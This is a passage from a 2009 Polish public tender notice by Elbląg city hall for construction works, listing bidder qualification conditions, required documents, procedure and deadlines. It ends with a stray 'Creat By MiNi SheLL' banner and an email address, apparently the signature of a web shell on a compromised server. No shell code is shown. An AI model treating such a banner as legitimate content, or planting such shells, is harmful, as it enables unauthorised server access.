a)	osiągnięcie średniorocznego przychodu za ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres (na podstawie Rachunku zysków i strat poz. przychód netto ze sprzedaży produktów, towarów i materiałów lub przychód netto ze sprzedaży i zrównane z nimi, a w przypadku Wykonawców niezobowiązanych do sporządzania sprawozdania finansowego innych dokumentów określających obroty) w wysokości nie mniejszej niż 5 000 000,00 zł.

Przy ocenie spełniania tego warunku udziału przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnieniu warunku będą zsumowane z dokumentów składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
	
Wartości podane w walutach innych niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP na dzień zakończenia roku obrotowego, podając datę i kurs.

4.  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

1) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 1. ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ
2) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 2. ppkt a) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VI. ppkt 1.3. SIWZ  
3) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 2. ppkt b) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VI. ppkt 1.4., 1.5.  i 1.6. SIWZ  
4) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 2. ppkt c) ogłoszenia Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VI. ppkt 1.7. SIWZ  

5) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 3. ppkt a) ogłoszenia Zamawiający dokona na   podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentu wymienionego w pkt VI. ppkt 1.8. SIWZ  

6) Potwierdzenia spełnienia warunku wymienionego w Sekcji III.2) pkt 4. ogłoszenia Zamawiający dokona na 
    podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1.  SIWZ oraz dokumentów wymienionych 
    w pkt VI. ppkt 1.2. SIWZ  

Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wymienionych w pkt VI. SIWZ, metodą spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający wymaga dostarczenia:

-   zgodnie z pkt VI. ppkt 1.1. SIWZ - Oświadczeń wynikających z art. 22 i 24 ustawy Prawo zamówień publicznych
Uwaga:
a)	Treść wymaganych Oświadczeń Zamawiający przekazuje na ZAŁĄCZNIKU NR 2 do SIWZ.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenia składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

-   zgodnie z pkt VI. ppkt 1.2. SIWZ - Aktualnego  odpisu  z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia  do ewidencji działalności gospodarczej, wystawionych nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Uwaga:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.

-  zgodnie z pkt VI. ppkt 1.3. SIWZ - Wykazu wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączenie dokumentów potwierdzających, że roboty te zostały wykonane należycie.
Uwaga:
a)	W wykazie należy wymienić roboty potwierdzające spełnienie przez Wykonawcę warunku określonego w Sekcji III.2) pkt 2. ppkt a) ogłoszenia.
b)	W przedmiocie zamówienia należy podać informację o rodzaju obiektu i wielkości kubatury obiektu.
c)	Dla robót wymienionych w wykazie należy załączyć dokumenty potwierdzające, że te roboty zostały wykonane należycie.
d)	Wartości podane w walutach innych niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP na dzień wystawienia Świadectwa Przejęcia/Protokołu odbioru robót, podając datę i kurs.
e)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w Sekcji III.2) pkt 2. ppkt a) ogłoszenia.

-   zgodnie z pkt VI. ppkt 1.4. SIWZ - Wykazu osób, którymi dysponuje lub będzie dysponował Wykonawca i 
które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności.
Uwaga:
a)	Na potwierdzenie spełniania warunku określonego w Sekcji III.2) pkt 2. ppkt b) ogłoszenia w wykazie osób należy wymienić osoby, które będą uczestniczyć w wykonywaniu zamówienia, którymi Wykonawca dysponuje lub będzie dysponował na podstawie pisemnego zobowiązania innych podmiotów.
b)	W doświadczeniu kierownika budowy branży ogólnobudowlanej należy podać łączną liczbę lat stażu pracy jako kierownik budowy.
c)	W doświadczeniu kierowników robót branżowych, tj. robót elektrycznych, sanitarnych i drogowych należy podać odpowiednio:
-  łączną liczbę lat stażu pracy jako kierownik robót elektrycznych,
-  łączną liczbę lat stażu pracy jako kierownik robót sanitarnych,
-  łączną liczbę lat stażu pracy jako kierownik robót drogowych.
d)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymieniony dokument Wykonawcy składają wspólnie.

-  zgodnie z pkt VI. ppkt 1.5. SIWZ - Pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie osób Wykonawca wskazał osoby, którymi będzie dysponował.
Uwaga:
a)	 Dokumenty składa ten Wykonawca, który w wykazie osób wskazał osoby, którymi będzie dysponował  
      na podstawie pisemnego zobowiązania innych podmiotów.
b)	 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymieniony 
       dokument Wykonawcy składają wspólnie.

-  zgodnie z pkt VI. ppkt 1.6. SIWZ - Dokumentów stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
Uwaga:
a)	 Dla osób wymienionych w wykazie osób, o którym mowa w pkt VI. ppkt 1.4. SIWZ, należy złożyć z ofertą dokumenty: decyzje o nadaniu uprawnień oraz aktualne zaświadczenia o przynależności do właściwej okręgowej izby samorządu zawodowego.
       Dla osób będących obywatelami państw członkowskich UE, którzy nabyli kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznacznej wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej zgodnie z ustawą z dnia 18.03.2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2008, nr 63, poz. 394) odpowiednią decyzję o uznaniu kwalifikacji zawodowych oraz zaświadczenie o wpisie do właściwej izby samorządu zawodowego.
       Wykonawca będzie zobowiązany do zapewnienia, że powyższe dokumenty (tj. decyzje i zaświadczenia) będą ważne przez cały okres trwania umowy tj. do momentu bezusterkowego odbioru przedmiotu zamówienia.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymienione dokumenty Wykonawcy składają wspólnie.

-  zgodnie z pkt VI. ppkt 1.7. SIWZ - Informacji na temat przeciętnej liczby zatrudnionych pracowników w  
    okresie ostatnich trzech lat, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym        
    okresie.
Uwaga:
     W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w Sekcji III.2) pkt 2. ppkt c) ogłoszenia.

-  zgodnie z pkt VI. ppkt 1.8. SIWZ - Części sprawozdania finansowego, tj. Rachunek zysków i strat, a jeżeli   
     ta część podlega badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią dla tej części sprawozdania finansowego, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności -  za okres ostatnich trzech lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres.
Uwaga:
a)	Wyżej wymieniony dokument Wykonawcy składają za ostatnie 3 lata obrotowe, za które Wykonawcy mają sporządzone sprawozdanie finansowe i które byli zobligowani wykonać.
b)	Wartości podane w walutach innych niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP na dzień zakończenia roku obrotowego, podając datę i kurs.
c)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument     składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w Sekcji III.2) pkt 3. ppkt a) ogłoszenia.

Dokumenty należy składać w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.

UWAGA:

1.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów wymienionych w pkt VI. ppkt 1.2. SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzające odpowiednio, że:
1)  nie otwarto jego likwidacji ani nie ogłoszono upadłości;
	
Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
	
2.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt 1. UWAGI zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.

Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

3.	Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.umelblag.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Elblągu
Wydział Zamówień Publicznych pokój 125 
82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.08.2009 godzina 09:30, miejsce: Urząd Miejski w Elblągu Wydział Zamówień Publicznych
                 82-300 Elbląg,  ul. Łączności 1, pokój nr 125.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Dotyczy Sekcji II.2) ogłoszenia  CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA
         data rozpoczęcia: 	data udzielenia zamówienia
         data zakończenia: 	30 czerwca 2010 r.

Creat By MiNi SheLL
Email: jattceo@gmail.com